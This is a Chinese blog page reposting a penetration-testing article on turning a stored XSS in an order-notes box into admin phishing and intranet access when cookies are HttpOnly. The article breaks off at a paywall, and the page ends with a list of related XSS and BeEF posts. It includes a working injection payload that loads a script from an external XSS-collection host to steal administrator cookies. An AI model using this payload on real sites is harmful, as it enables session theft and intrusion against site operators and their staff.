一个xss漏洞到内网漫游【送多年心血打造的大礼包啦！】

最新推荐文章于 2024-04-25 15:30:00 发布

原创

最新推荐文章于 2024-04-25 15:30:00 发布 · 622 阅读

1 ·

CC 4.0 BY-SA版权

本文介绍了如何在遇到开启HTTPOnly的网站时，利用XSS漏洞钓鱼拿下后台。通过创建钓鱼HTML文件，修改相对路径为绝对路径，并通过XSS平台触发，实现管理员在不知情的情况下输入账号密码，从而获取内网权限。

i春秋作家：jasonx

原文来自：一个xss漏洞到内网漫游【送多年心血打造的大礼包啦！】

前言

渗透过程中，有时候遇某些网站，明明检测到有xss漏洞，但是盲打以后，收到的cookie还是不能登录后台，大多数的原因都是因为对方的cookie关键参数开启了httponly，导致你获取到的cookie参数不全，所以没法登录。

今天和大家分享一次绕过httponly拿后台的思路。

0x01 遇到一个存在xss的站点

这个站点在提交订单的时候，下面有个订单备注输入框存在存储型xss。
我们直接插入插入xss代码；

</textarea>'"><script src=https://xx.cc/x/7Zbi58></script>

过了没多久拿到了cookie

但是我们尝试用cookie登录的时候失败了。

那么问题来了，如何才能拿到后台呢？

0x02 xss钓鱼拿下后台

因为xss平台已经收到后台的url地址了。
那么我们直接访问这个后台地址，然后右键查看源代码。

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

张悠悠66

关注关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

JAVA WEB之XSS漏洞详解及防御措施

洛阳泰山的博客

09-06

2735

pom文件依赖  <dependency> <groupId>org.jsoup</groupId> <artifactId>jsoup</artifactId> <version>1.13.1</version> </dependency> 工具类代码

【网络安全】实操XSS订单系统漏洞（利用盲打）

你在看屏幕的同时，屏幕也在注视着你

09-07

4390

xss订单靶场实战

1 条评论您还未登录，请先登录后发表或查看评论

HTTP only下XSS劫持登录表单到内网沦陷

weixin_40418457的博客

05-09

377

virtual host discover发现多处内网系统，但大多数系统都接入了统一认证。在某些系统以及他的一些接口中我可以未授权访问，收集到大量的员工信息包括email，姓名等。在测试完接口未授权之类的漏洞我尝试去找一些不一样的东西绕过uuap。闲逛了一段时间后在一个子系统登录点我发现了一个可疑的点，uri里面的errorMessage内容出现在了页面上，于是顺手一测一个反射型xss到手。但可惜的是此处Cookie有HTTP only，打cookie绕uuap看来是没希望。想两两相忘于江湖却有

【学习笔记】日志xss打内网，nginx&apache结合的bug

chualam的博客

11-12

422

apache和nginx的日志不美观，很难看，所以一些管理员会对其进行排版并输出成html的格式这时我们在消息头的ua部分进行xss提交即可获取内网IP的js代码(使用WebRTC，因为浏览器限制，想获取真实的外网IP，除chrome、Firefox之外都不行)。如果想获取外网IP，把第12行，改为 servers ={iceServers:[{urls:“stun:stun.services.mozilla.com”}]};就行了。在文章底部会给出代码，大伙可自行下载(打开控制台即可见到IP)。O

metasploit利用IE漏洞XSS挂马拿内网主机

代码析构师的专栏

08-07

1062

metasploit内网渗透方面好多方式，这只是科普下xss在内网中的利用。系统:KALI 用到的工具：beEF+msf 利用的IE漏洞是：http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf MS12-063 Automatic IE 7 on Windows

内网渗透一：利用Xss漏洞进入内网

WHACKW的专栏

11-17

5746

0x01:科普 Beef目前欧美最流行的WEB框架攻击平台，全称：The Browser Exploitation Framework Project. Beef利用简单的XSS漏洞，通过一段编写好的JavaScript（hook.js）控制目标主机的浏览器，通过目标主机浏览器获得该主机的详细信息，并进一步扫描内网，配合metasploit绝对是内网渗透一大杀器。 0x02安装

横向移动：内网渗透 - 靶场模拟测试.【从0到1】

网络安全领域___专研者.

06-05

3296

内网穿透又被称为NAT穿透，内网端口映射外网，在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。通过映射端口，让外网的电脑找到处于内网的电脑。端口映射，就是NAT地址转换的一种，功能就是把在公网的地址转翻译成私有地址。在局域网内部的任一PC或服务器上运行到内网穿透客户端，此时域名解析到的IP地址是局域网网关出口处的公网IP地址，再在网关处做端口映射指向监控设备即可.

XSS漏洞

2401_83181186的博客

04-25

1367

XSS漏洞介绍以及beef，waf简介

【XSS漏洞-01】XSS漏洞简介、危害与分类及验证

zz12345600354的博客

04-23

1479

定义/原理：跨站脚本（Cross-Site Scripting），本应该缩写为CSS，但是该缩写已被层叠样式脚本Cascading Style Sheets所用，所以改简称为XSS。也称跨站脚本或跨站脚本攻击。跨站脚本攻击XSS通过将恶意得Script代码注入到Web页面中，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。本质：是一种针对网站应用程序的安全漏洞攻击技术，是代码注入的一种。特点：XSS主要基于JavaScript。

XSS漏洞检测和利用

最新发布

2301_80127209的博客

04-25

2263

通过构造一些特殊的xss poc，在可能出现XSS漏洞测试点将这些语句传入网站，我们就能过够相对轻松的探测出XSS漏洞。

XSS盲打

weixin_44749329的博客

05-19

4325

XSS盲打 XSS盲打：它不是一种XSS漏洞的类型，它其实是一种XSS一种的攻击场景。以下来实施XSS的一种盲打 1.打开pikachu里的XSS的盲打 2.输入一个字符来测一下看它有什么样的作用，点击提交后显示如图这句话仿佛在说我们输入的内容并不会在前端输出，看起来好像是被提交到了后台，它的管理员有可能会被看，只有他的管理员能看到我输入的内容，前端的用户是看不到的 3.我们来设想一种...

XSS自动化入侵内网

匆匆那年的专栏

08-17

2668

XSS自动化入侵内网 0×01 前言：很多人都认为XSS只能做盗取cookies的活。以至于有些SRC、厂商对待反射型XSS视而不见，或者说是根本不重视。直到“黑哥”在之前的演讲中提到XSS入侵内网，情况才得以好转。但是经过本人测试，黑哥所说的XSS内网入侵，应该是包含了浏览器漏洞。那没有浏览器漏洞该如何呢？就像0x_Jin之前在乌云报道的搜狐漏洞那样：http://www.wooy...

安全研究显示：Heartbleed漏洞攻击又有新招？！

u016419793的专栏

06-12

384

图片／消息来源前几个月发生的Heartbleed漏洞，最近又被葡萄牙的安全研究者发现一个新的攻击模式，发现最新的攻击模式可透过Wi-Fi利用相同的漏洞攻击网站窃取数据。这次这个攻击被称为「Cupid」，主要是透过Wi-Fi当作媒介而不是传统网路，经由备感染的路由器和它相连的Andr??oid设备当中窃取用户的资料。目前最容易受到攻击的是EAP协议的路由器，因为要透过密码登入的关係，骇客就可从Hea

XSS漏洞的利用

LizePing_的博客

07-29

5822

XSS的利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求，远程登录其它利用XSS窃取cookie 窃取cookie是xss利用最常见的手段，攻击者有了cookie就相当于拥有了“管理员”身份。通常需要配合xss平台来进行攻击，当被攻击者访问到有恶意代码的页面，他的cookie就会被发送到xss平台。

我是如何通过一个 XSS 探测搜狐内网扫描内网并且蠕动前台到最后被发现的

weixin_30325487的博客

07-08

415

我是如何通过一个 XSS 探测搜狐内网扫描内网并且蠕动前台到最后被发现的！(附带各种 POC) | WooYun-2014-76685 | WooYun.orghttp://wooyun.org/bugs/wooyun-2014-076685 传送门：文章很精彩转载于:https://www.cnblogs.com/dongchi/p/4073410.html...

【渗透测试工具beef】XSS渗透测试工具beef如何安装使用？

请大家直接把问题写在评论区或留言，不要只说一句"你好或在吗"，我会尽快回复的。

04-25

7879

目录 beef介绍 beef工作原理简介 kali下使用beef beef配置IP地址及默认密码使用beef攻击流程启动beef 通过web端访问 1、输入config.xml中配置的用户名和密码，登录beef管理台 2、在网站中植入hook.js代码 3、客户端192.168.107.110，访问这个页面，就会被beef勾住，浏览器的大量信息就被beef获取到了 4、获取浏览器cookie 5、网页重定向,目标浏览器跳转到你指定的网页 6、登录弹窗，获取用户名和密码 .

XSS 漏洞学习

iO快到碗里来

08-10

834

XSS漏洞学习实战 XSS简介 XSS（Cross Site Scripting）攻击全称跨站脚本攻击，是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS，XSS是一种经常出现在web应用中的计算机安全漏洞，它允许恶意web用户将代码植入到提供给其它用户使用的页面中，当受害者访问这些页面时，浏览器会解析并执行这些恶意代码，从而达到窃取用户身份/钓鱼/传播恶意代码等行为。主要有三种类型：存储型XSS、反射型XSS（也叫做非持久性）、Dom型XS

XSS漏洞原理和利用